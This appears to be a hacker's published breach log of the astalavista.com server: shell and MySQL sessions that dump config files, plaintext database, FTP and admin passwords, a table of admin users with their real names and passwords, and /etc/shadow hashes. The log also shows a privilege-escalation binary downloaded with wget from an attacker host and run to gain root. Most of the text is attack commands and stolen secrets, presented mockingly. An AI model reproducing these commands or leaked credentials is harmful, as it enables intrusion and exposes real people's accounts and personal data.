> drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 .
> drwx--x--x 8 astanet astanet 4096 Dec 23 13:53 ..
> drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
> drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
> drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16
> astanet@xxxxxxxxxxxxxxx
> drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
> drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
> -rw-r--r-- 1 astanet astanet 25724 Apr 4 2006 banner.jpg
> drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
> drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
> drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
> -rw-r--r-- 1 astanet astanet 36 Jan 5 2006 error.php
> -rw-r--r-- 1 astanet astanet 1406 Jan 5 2006 favicon.ico
> drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed
> drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
> -rw-r--r-- 1 astanet astanet 18 Jan 5 2006 htaccess
> -rw-r--r-- 1 astanet astanet 585 Mar 24 14:50 .htaccess
> -rw-r--r-- 1 astanet astanet 398 Jan 5 2006 index1.php
> -rw-r--r-- 1 astanet astanet 1036 Jan 5 2006 _index.html
> -rw-r--r-- 1 astanet astanet 6880 Dec 23 14:44 index.php
> -rw-r--r-- 1 astanet astanet 676 Mar 21 2006 index_redirect.php
> -rw-r--r-- 1 astanet astanet 739 Feb 24 2006 index.swf
> drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
> drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
> drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
> drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
> drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
> drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
> drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
> -rw-r--r-- 1 astanet astanet 7219 Feb 24 2006 pix1.swf
> drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
> -rw-r--r-- 1 astanet astanet 23 Jan 5 2006 robots.txt
> drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
> drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
> drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
> drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
> drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
> drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
> drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
> drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
> -rw-r--r-- 1 astanet astanet 35 Dec 4 2006 webcash.php
> drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
>
> sh-3.2$ head -20 index.php
> <?PHP
> /**
> * Mainfile (external) for astalavistaNET v2.0
> *
> * @copyright Astalavista IT Engineering GmbH
> * @author Thomas Kaelin <thomas.kaelin@xxxxxxxxxxxxxx>
> * @version 1.0
> */
>
> if ($_SERVER['PHP_SELF'] == '/webcash.php') {
> $dontStartSession = false;
> } else {
> $dontStartSession = true;
> }
>
> require_once($_SERVER['DOCUMENT_ROOT'].'/config/com.conf.php');
>
> require_once($_SERVER['DOCUMENT_ROOT'].'/config/ext.conf.php');
>
> require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'com.cl
> ass.php');
>
> require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].'ext.cl
> ass.php');
>
> sh-3.2$ cd config
> sh-3.2$ ls -la
> total 32
> drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
> drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
> -rw-r--r-- 1 astanet astanet 987 Aug 11 2006 adm.conf.php
> -rw-r--r-- 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
> -rw-r--r-- 1 astanet astanet 913 Aug 11 2006 cron.conf.php
> -rw-r--r-- 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
> -rw-r--r-- 1 astanet astanet 2724 May 30 2007 int.conf.php
>
> sh-3.2$ cat com.conf.php
> [snip]
> //member-database
> $_CONFIG['db_mem_server'] = 'localhost';
> $_CONFIG['db_mem_database'] = 'astanet_membersystem';
> $_CONFIG['db_mem_user'] = 'astanet_db';
> $_CONFIG['db_mem_password'] = 'TXwVrC7hbq';
> $_CONFIG['db_mem_debug'] = false; //true or false
> //ads-database
> $_CONFIG['db_ads_server'] = 'localhost';
> $_CONFIG['db_ads_database'] = 'astanet_ads';
> $_CONFIG['db_ads_user'] = 'astanet_db';
> $_CONFIG['db_ads_password'] = 'TXwVrC7hbq';
> $_CONFIG['db_ads_debug'] = false; //true or false
> //rainbow-database
> $_CONFIG['db_rainbow_server'] = '212.254.194.163';
> $_CONFIG['db_rainbow_database'] = 'rainbow';
> $_CONFIG['db_rainbow_user'] = 'dinu';
> $_CONFIG['db_rainbow_password'] = 'dinudinu';
> $_CONFIG['db_rainbow_debug'] = false; //true or false
> //mailing lists database
> $_CONFIG['db_mailing_lists_server'] = 'localhost';
> $_CONFIG['db_mailing_lists_database'] = 'astanet_mailing_lists';
> $_CONFIG['db_mailing_lists_user'] = 'astanet_db';
> $_CONFIG['db_mailing_lists_password'] = 'TXwVrC7hbq';
> $_CONFIG['db_mailing_lists_debug'] = false; //true or
> false
> //paypal
> $_CONFIG['sub_pp_url'] = 'https://www.paypal.com/cgi-
> bin/webscr';
> $_CONFIG['sub_pp_cmd'] = '_xclick';
> $_CONFIG['sub_pp_business'] = 'info@xxxxxxxxxxxxxxx';
> $_CONFIG['sub_pp_noship'] = '1';
> $_CONFIG['sub_pp_referer'] = 'https://www.paypal.com/';
> [snip]
>
> sh-3.2$ cd ..
> sh-3.2$ cd member
> sh-3.2$ ls -la
> total 20
> drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
> drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
> -rw-r--r-- 1 astanet astanet 19 Jan 13 14:02 .htaccess
> -rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
> sh-3.2$ cat .htaccess
> SecFilterEngine off
>
> sh-3.2$ cd ..
> sh-3.2$ cd cron
> sh-3.2$ ls -la
> total 168
> drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
> drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
> -rw-r--r-- 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
> -rw-r--r-- 1 astanet astanet 2356 Aug 11 2006 0_functions.php
> -rw-r--r-- 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
> -rw-r--r-- 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
> -rw-r--r-- 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
> -rw-r--r-- 1 astanet astanet 432 Aug 11 2006 1_weekly.php
> -rw-r--r-- 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
> -rw-r--r-- 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
> -rw-r--r-- 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
> -rw-r--r-- 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
> -rw-r--r-- 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
> -rw-r--r-- 1 astanet astanet 7657 Aug 15 2006
> 2_exploitree_updater.php
> -rw-r--r-- 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
> -rw-r--r-- 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
> -rw-r--r-- 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
> -rw-r--r-- 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php
> -rw-r--r-- 1 astanet astanet 7558 Aug 11 2006
> 2_proxy_collector.php
> -rw-r--r-- 1 astanet astanet 796 Aug 11 2006
> 99_create_emails.php
> drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
> -rw-r--r-- 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
> -rw-r--r-- 1 astanet astanet 9620 Jan 6 16:05
> login_reminder_test.php
>
> sh-3.2$ cd ..
> sh-3.2$ cd _007
> sh-3.2$ ls -la
> total 24
> drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
> drwxr-x--- 29 astanet apache 4096 Jan 6 13:58 ..
> -rw-r--r-- 1 astanet astanet 96 Dec 23 15:17 .htaccess
> -rw-r--r-- 1 astanet astanet 3263 Jan 15 2007 index.php
> -rw-r--r-- 1 astanet astanet 20 Dec 27 2006 info.php
> drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap
>
> sh-3.2$ cat .htaccess
> authType Basic
> authName Admin
> authUserFile /home/astanet/auth/.htadm_pwd
> require valid-user
>
> sh-3.2$ cat /home/astanet/auth/.htadm_pwd
> admin2net:CR0bl65MwhfT
>
> sh-3.2$ mysql -u astanet_db -p
> Enter password:
> Welcome to the MySQL monitor. Commands end with ; or \g.
> Your MySQL connection id is 275153
> Server version: 5.0.45-community-log MySQL Community Edition (GPL)
>
> Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
>
> mysql> show databases;
> +-----------------------+
> | Database |
> +-----------------------+
> | information_schema |
> | astanet_ads |
> | astanet_mailing_lists |
> | astanet_mediawiki |
> | astanet_membersystem |
> | test |
> +-----------------------+
> 6 rows in set (0.00 sec)
>
> mysql> use astanet_membersystem
> Database changed
> mysql> show tables;
> +-----------------------------------+
> | Tables_in_astanet_membersystem |
> +-----------------------------------+
> | blacklist_categories |
> | blacklist_content |
> | blacklist_levels |
> | blacklist_mcset |
> | dir_categories |
> | dir_comments |
> | dir_links |
> | dir_temp |
> | dir_votes |
> | documents |
> | documents_categories |
> | email_content |
> | email_settings |
> | exploits |
> | exploits_categories |
> | exploittree_categories |
> | exploittree_exploits |
> | home_values |
> | iso_countries |
> | links_categories |
> | links_records |
> | links_unauth |
> | links_votes |
> | log |
> | news_categories |
> | news_comments |
> | news_emoticons |
> | news_latest |
> | news_messages |
> | news_statistics |
> | news_votes |
> | prices_content |
> | prices_offers |
> | rss_settings |
> | sessions |
> | stats_signups |
> | u2u2 |
> | u2u_contact |
> | u2u_settings |
> | user_keywords_selected_categories |
> | users |
> | users_ipn_test |
> | users_keyword_values |
> | users_profile |
> | users_temp |
> | users_upgrade |
> +-----------------------------------+
> 46 rows in set (0.00 sec)
>
> mysql> describe users;
> +--------------------------+--------------------------------------+-
> -----+-----+---------------------+----------------+
> | Field | Type |
> Null | Key | Default | Extra |
> +--------------------------+--------------------------------------+-
> -----+-----+---------------------+----------------+
> | primary_key | smallint(5) unsigned |
> NO | PRI | NULL | auto_increment |
> | user | varchar(50) |
> NO | | | |
> | nickname | varchar(30) |
> NO | MUL | anonymous | |
> | password | varchar(30) |
> NO | | | |
> | userlevel | tinyint(3) |
> YES | MUL | NULL | |
> | exp | int(8) unsigned |
> NO | | 0 | |
> | email | varchar(50) |
> NO | | | |
> | ip | varchar(15) |
> NO | | 0 | |
> | proxy | set('0','1') |
> NO | | 0 | |
> | logtime | timestamp |
> NO | | CURRENT_TIMESTAMP | |
> | login_reminder_last_sent | timestamp |
> NO | | 0000-00-00 00:00:00 | |
> | anz_in | tinyint(1) |
> NO | | -1 | |
> | status | tinyint(1) unsigned |
> NO | | 0 | |
> | checked | set('0','1','2') |
> NO | | 0 | |
> | freemember | set('0','1') |
> NO | | 0 | |
> | ordertype | set('transfer','wp','pp','mc','CnB') |
> YES | | NULL | |
> | lang | tinytext |
> NO | | | |
> | adid | smallint(6) |
> NO | | 0 | |
> | pp_txn_id | varchar(255) |
> YES | | NULL | |
> | cnb_transaction_id | varchar(255) |
> YES | | NULL | |
> | cnb_order_id | varchar(255) |
> YES | | NULL | |
> | cnb_user_id | int(11) |
> YES | | 0 | |
> +--------------------------+--------------------------------------+-
> -----+-----+---------------------+----------------+
> 22 rows in set (0.01 sec)
>
> mysql> select count(*) as skids from users;
> +-------+
> | skids |
> +-------+
> | 25199 |
> +-------+
> 1 row in set (0.00 sec)
>
> mysql> select user,nickname,password,email from users where
> userlevel = 1;
> +--------------------------+----------------------+-----------------
> -+-----------------------------------+
> | user | nickname | password
> | email |
> +--------------------------+----------------------+-----------------
> -+-----------------------------------+
> | pascal | prozac | astaman3
> | info@xxxxxxxxxxxxxxx |
> | Ivan Schmid | rOOtless1 |
> astalavista4asta | ivan.schmid@xxxxxxxxxxxxx |
> | qreymer | Palermo | qblsw85iam
> | eche@xxxxxxx |
> | Christian Wehrli | g0atherd | hitt?74
> | g0atherd@xxxxxxx |
> | Andrew Blake | Minky | liq73uid
> | a.blake@xxxxxxxxxxxxx |
> | Martin Wyss | dinu | kj63;cXy
> | martin.wyss@xxxxxxxxxxxxxxx |
> | Leandro Nery | Timan_no_Sanco | nery2002
> | leandronery@xxxxxxxxxxx |
> | shaving ryans privates | ShavingRyansPrivates | memberboard313
> | shavingryansprivates1@xxxxxxxxxxx |
> | Gerben van der Lubbe | Spoofed Existence | Lb59eXg5
> | spoofedexistence@xxxxxxxxxxx |
> | David M Lee | Daremo | icG12m03
> | daremo@xxxxxxxxxxxxxxxx |
> | David Corn | akriel | ve3uB$cUku
> | akriel@xxxxxxxxxxxxxx |
> | Thomas Kalin | Gwanun | QwErTy123
> | thomas.kaelin@xxxxxxxxxxxxxxx |
> | Marcus unknown | Cra58cker | hhCr4ck06
> | unknownmarcus@xxxxxxxxxxx |
> | David Ellis | dellis203 | philip
> | dellis@xxxxxxxxxxxxxxxxx |
> | Lars Christian Solberg | xeor | tF3s4|Nea
> | xeor@xxxxxxxx |
> | Paulo Santos | Be1er0ph0r1 | amor01
> | pmsantos@xxxxxx |
> | Thomas D?ppen | daha | asta4tom
> | thomas.daeppen@xxxxxxxxxxxxxx |
> | Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck
> | toraj.a.m@xxxxxxxxx |
> | Fabius Bernet | traviser | wellenreiter100
> | fabius.bernet@xxxxxxxxxxxxxx |
> | Zachary McElroy | duder1 | dirty245dix
> | mcelroyzj@xxxxxxxxx |
> | Leron Cohen | cohen2 | leron4free
> | leron@xxxxxxxxxxxxxxx |
> | Beatriz Pontes | anonymous1656 | pitas
> | joao.pedro.pontes@xxxxxxxxx |
> | Glafkos Charalambous | anonymous2086 | si99490178$#
> | nowayout@xxxxxxxxxxxxxxx |
> | developer COMVATION | anonymous2402 | Ri?Q$Q$MVU
> | ivan.schmid@xxxxxxxxxxxxxx |
> | Peter Fisher | cyph3r1 | testZer025435
> | cyph3r@xxxxxxxxxxxxxxx |
> | sykadul | sykadul | ak29eral
> | sykadul@xxxxxxxxx |
> | Ronny Janzi | commander1 | mpbdaagf6m
> | ronny.janzi@xxxxxxxxxxxxxx |
> +--------------------------+----------------------+-----------------
> -+-----------------------------------+
> 27 rows in set (0.00 sec)
>
> mysql> exit;
> Bye
>
> [~] plaintext passwords? yes,
> Those so called "security professionals" who charge you $6.66 /
> month to
> register at their hack-proof portal, save your passwords in
> plaintext...
> brilliant!
>
>
> [~] This been fun but we want more.
>
> sh-3.2$ uname -a
> Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu
> May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
> sh-3.2$ wget http://anti.sec.labs/g0troot
> --13:33:37-- http://anti.sec.labs/g0troot
> Resolving anti.sec.labs... 13.33.33.37
> Connecting to anti.sec.labs|13.33.33.37|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 18200 (18K) [text/plain]
> Saving to: `g0troot'
>
> 100%[===============================================================
> ====================================================================
> ======>] 18,200 58.6K/s in 0.3s
>
> 18:55:14 (58.6 KB/s) - `g0troot' saved [18200/18200]
>
> sh-3.2$ ./g0troot -i x86_64
> [+] g0troot - anti.sec.labs
> [+] Target: 2.6.18-128.1.10.el5
> [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
>
> [+] r00tr00t
> [~] Executing shell...
>
> sh-3.2# id
> uid=0(root) gid=0(root)
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
>
> sh-3.2# cat /etc/shadow
> root:$1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
> [snip]
> admin:$1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
> jon:$1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
> com:$1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
> astanet:$1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
>
> sh-3.2# cat /etc/motd
> #####################################################
> #____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
> # |__| [__ | |__| | |__| | | | [__ | |__| #
> # | | ___] | | | |___ | | \/ | ___] | | | #
> # #
> #####################################################
> # #
> # Admin Contact - support@xxxxxxxxxxxxxxxxxxxx #
> # #
> # Available ShortCuts #
> # #
> # nst - list active connections #
> # ddos - shows how many times each ip is connected #
> # ltr - restart the webserver #
> # phpc - edit the php config file #
> # htc - edit the webserver configuration file #
> # up - uptime #
> # etd - edit the motd of the day file #
> # htr - start and restart apache if needed #
> # syng - shows active SYN_RECV connections #
> # synd - syn flood blocker - "synd -h" for usage #
> #####################################################
> # NOTES: #
> # Last Upgrade - 12-08-2008 by JF #
> # My.cnf/Mysql Optimization - 1-28-09 #
> # #
> # #
> # #
> #####################################################
>
> sh-3.2# lastlog | grep -v Never
> Username Port From Latest
> root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14
> +0000 2009
> admin pts/1 cp.secureservert Thu Mar 20 10:25:39
> +0000 2008
> com pts/0 cust.static.212- Tue Jun 2 07:46:30
> +0000 2009
> astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44
> +0000 2009
>
> sh-3.2# ls -la
> total 453376
> drwxr-x--- 15 root root 4096 Jun 4 08:40 .
> drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
> -rw-r--r-- 1 root root 2394400 Oct 19 2007 10mbtest.zip
> -rw------- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
> -rw------- 1 root root 16836 Jun 4 07:21 .bash_history
> -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
> -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile
> -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
> -rwx------ 1 root root 1899 Oct 28 2007 bk.sh
> -rw-r--r-- 1 root root 1327 Nov 29 2007 cert
> -rw-r--r-- 1 root root 139860821 May 14 2008
> contrexxbackup_20080514.sql
> drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
> -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
> -rw-r--r-- 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
> drwx------ 2 root root 4096 Oct 28 2007 .elinks
> drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
> -rw-r--r-- 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
> -rw------- 1 root root 0 Apr 16 13:19 .history
> -rw-r--r-- 1 root root 16095 Sep 11 2007 install.log
> -rw-r--r-- 1 root root 2566 Sep 11 2007 install.log.syslog
> -rw-r--r-- 1 root root 1003 Jul 22 2007 install.sh
> -rw------- 1 root root 35 Jun 2 14:23 .lesshst
> drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
> drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
> -rw-r--r-- 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-
> grsec.tar.gz
> -rw-r--r-- 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
> -rwx------ 1 root root 760 Sep 18 2008 lp
> drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
> -rw-r--r-- 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-
> x86_64-linux.tar.gz
> -rw-r--r-- 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-
> x86_64-linux.tar.gz.1
> drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
> -rw-r--r-- 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-
> x86_64-linux.tar.gz
> drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
> -rw-r--r-- 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-
> x86_64-linux.tar.gz
> -rw-r--r-- 1 root root 25316 Feb 15 2006 mybk.sh
> -rw------- 1 root root 41 Oct 19 2007 .my.cnf
> -rw------- 1 root root 2902 Jun 4 08:40 .mysql_history
> -rwx------ 1 root root 38873 Apr 16 2008 mysqlreport
> -rw------- 1 root root 41 May 20 2008 .mytop
> drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
> -rw-r--r-- 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
> drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
> -rw------- 1 root root 1462 Sep 21 2007 opt.php
> -rw-r--r-- 1 root root 3371 Sep 22 2007 p
> -rw-r--r-- 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
> -rw------- 1 root root 1024 Feb 3 21:32 .rnd
> -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
> -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
> drwx------ 2 root root 4096 Oct 10 2008 .ssh
> -rw-r--r-- 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
> -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
> -rw-r--r-- 1 root root 104874307 Oct 17 2007 test100.zip
> -rw-r--r-- 1 root root 67085540 Oct 19 2007 test100.zip.1
> drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
> -rw-r--r-- 1 root root 42596 May 21 2007 tuning-primer.sh
> drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
> -rw-r--r-- 1 root root 4519551 Dec 11 2007 valgrind-
> 3.3.0.tar.bz2
> -rw------- 1 root root 12997 May 16 2008 .viminfo
>
> sh-3.2# cat .bash_history
> [snip]
> wget cp4sst.com/sstlinux.tar.gz
> tar zxvf sstlinux.tar.gz
> cd linux-2.6.27.10
> sh install.sh
> make bzImage ; make modules ; make modules_install ; make install
> make clean
> service mysqld restart
> [snip]
> cd /usr/sbin/
> chmod 4777 traceroute
> chmod 4777 ping
> traceroute -I www.astalavista.ch
> [snip]
> vi /etc/csf/csf.conf
> traceroute google.ch
> service csf restart
> tracert google.ch
> service csf restart
> traceroute www.google.ch
> tracert www.google.ch
> traceroute www.google.ch
> locate traceroute
> chown 4755 /bin/traceroute
> chown 4777 /bin/traceroute
> locate ping
> chown 4755 /bin/ping
> chown 4777 /bin/ping
> cd /bin/
> ls -ali | grep ping
> chown root ping
> chmod 4755 ping
> ls -ali | grep traceroute
> chown root traceroute
> chmod 4755 traceroute
> ls -ali | grep traceroute
> traceroute -I www.google.ch
> traceroute www.google.ch
> whois pmsantos.ch
> [snip]
> mysql -h com_contrexx2_live < /root/defaultp_ports.sql
> mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live <
> /root/defaultp_ports.sql
> mysql -h -u contrexxuser2 -p com_contrexx2_live <
> /root/defaultp_ports.sql
> mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
> top
> ping ssth.ch
> ping asdlkfaljgasd???ljg???lasj.ch
> ping asdlkfaljgasdlasj.ch
> ping www.ssth.ch
> ping ssth.ch
> nslookup www.google.ch
> nslookup www.ssth.ch
> man nslookup
> ping www.google.ch
> nslookup www.google.ch
> nslookup www.google.ch
> nslookup salfjasdlf.ch
> [snip]
> openssl passwd -1 sadf
> openssl passwd -1 5cZNHstdTy
> mysql
> mysql
> locate proftp
> vi /etc/proftpd.passwd
> service proftpd restart
> locate proftpd.conf
> vi /etc/proftpd.conf
> vi /etc/proftpd.passwd
> service proftpd restart
> [snip]
> /bin/sh /home/com/backup_system/backup.sh
> tar cfv /home/com/backups/09-04-28_backup.tar
> /home/com/public_html/admin
> mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
> com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
> mysqldump -h localhost -u contrexxuser2 --password=0fEYNZgXz1pKe
> com_contrexx2 > 09-04-29-com_contrexx2-full.sql
> ls -ali
> mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS
> com_contrexx > 07-04-29-com_contrexx-full.sql
> mysqldump -h localhost -u com_user1 --password=Undv7gu29gvb5ikhS
> ideapool > 07-04-29-ideapool-full.sql
> crontab -l
> crontab -l
> php -q /home/com/public_html/modifications/cronjobs/securitynews.php
> /home/com/public_html/modifications/cronjobs/exploits.sh
> wget http://www.litespeedtech.com/packages/4.0/lsws-4.0.3-ent-
> x86_64-linux.tar.gz
> tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
> cd lsws-4.0.3
> sh install.sh
> uptime
> hdparm -tt /dev/sda
> iostat
> yum install iostat
> iostat
> whereis iostat
> yjm clean all
> yum clean all ; yum -y update
> iostat
> yum install systat
> rpm -qa | grep iostat
> rpm -qa | grep sysstat
> rpm -qa | grep systat
> dmesg -c
> sysctl -p
> uname -r
> cd /usr/src
> wget nix101.com/kernels/sstlinux.tar.gz
> shutdown -r now
> nano -w /boot/grub/grub.conf
>
> sh-3.2# cat .my.cnf
> [client]
> user=da_admin
> password=X9dctmRH
>
> sh-3.2# cat /home/com/backup_system/backup.sh
> #!/bin/sh
> ####################################################################
> #
> #
> #
> # incremental backup for astalavista.com
> #
> #
> #
> # author: Paulo M. Santos <paulo.santos@xxxxxxxxxxxxxxx>
> #
> #
> #
> ####################################################################
> #
> [snip]
> PROG_DIR="/home/com/backup_system";
> BACKUP_DIR="/home/com/backups";
> DOBACKUP_FROM="/home/com/domains/astalavista.com/public_html";
> # ftp for synology backup server
> FTP_HOST="212.254.194.163";
> FTP_PORT="21";
> FTP_USER="astalavista.com";
> FTP_PASS="yWHOJbzpWTWC6Xrmg1WnfBk5V";
> FTP_DIR="/astalavista.com";
> # database
> DB_HOST="localhost";
> DB_USER="contrexxuser2";
> DB_PASS="0fEYNZgXz1pKe";
> DB_DATABASE1="com_contrexx2_live";
> DB_DATABASE2="com_contrexx2";
> [snip]
> ftp -in $FTP_HOST $FTP_PORT <<EOF
> quote USER $FTP_USER
> quote PASS $FTP_PASS
> cd $FTP_DIR
> put $DB_FULLNAME-SQL_Dump.tar
> put $BACKUP_FULLNAME-Public_HTML.tar
> close
> bye
> EOF
>
> sh-3.2# cd /home
> sh-3.2# ls -la
> total 120
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
> drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
> drwx--x--x 9 admin admin 4096 Nov 28 2007 admin
> -rw------- 1 root root 8192 Jun 4 03:03 aquota.group
> -rw------- 1 root root 8192 Jun 3 02:45 aquota.user
> drwx--x--x 6 astanet astanet 4096 Jun 4 09:51 astanet
> drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
> drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
> drwx--x--x 10 com com 4096 Apr 28 12:40 com
> drwxr-xr-x 2 root root 4096 May 17 2007 ftp
> drwx------ 3 jon jon 4096 Sep 21 2007 jon
> drwx------ 2 root root 16384 Sep 11 2007 lost+found
> drwxr-xr-x 2 root root 4096 Sep 14 2007 my
> drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
> drwx------ 2 jon jon 4096 Sep 15 2007 test
> drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
>
> sh-3.2# cd admin
> sh-3.2# ls -la
> total 1735896
> drwx--x--x 9 admin admin 4096 Nov 28 2007 .
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
> drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
> drwx------ 2 admin admin 4096 Sep 28 2007 backups
> -rw------- 1 admin admin 860 Sep 17 2008 .bash_history
> -rw-r--r-- 1 admin admin 24 Sep 14 2007 .bash_logout
> -rw-r--r-- 1 admin admin 176 Sep 14 2007 .bash_profile
> -rw-r--r-- 1 admin admin 124 Sep 14 2007 .bashrc
> drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
> drwx--x--x 6 admin admin 4096 Sep 21 2007 domains
> drwxrwx--- 3 admin mail 4096 Sep 21 2007 imap
> -rw-r--r-- 1 root root 24 Sep 21 2007 info.php
> drwx------ 2 admin admin 4096 Sep 21 2007 mail
> -rw-r--r-- 1 root root 716 Nov 28 2007 server.csr
> -rw-r--r-- 1 root root 887 Nov 28 2007 server.key
> -rw-r----- 1 admin mail 34 Sep 14 2007 .shadow
> -rw-r----- 1 admin com 1775711054 Oct 25 2007
> user.admin.com.tar.gz
> drwx--x--x 2 admin admin 4096 Jul 29 2008 user_backups
>
> sh-3.2# ..
> sh-3.2# cd jon
> sh-3.2# ls -la
> total 36
> drwx------ 3 jon jon 4096 Sep 21 2007 .
> drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
> -rw------- 1 jon jon 53 Sep 21 2007 .bash_history
> -rw-r--r-- 1 jon jon 24 Sep 21 2007 .bash_logout
> -rw-r--r-- 1 jon jon 176 Sep 21 2007 .bash_profile
> -rw-r--r-- 1 jon jon 124 Sep 21 2007 .bashrc
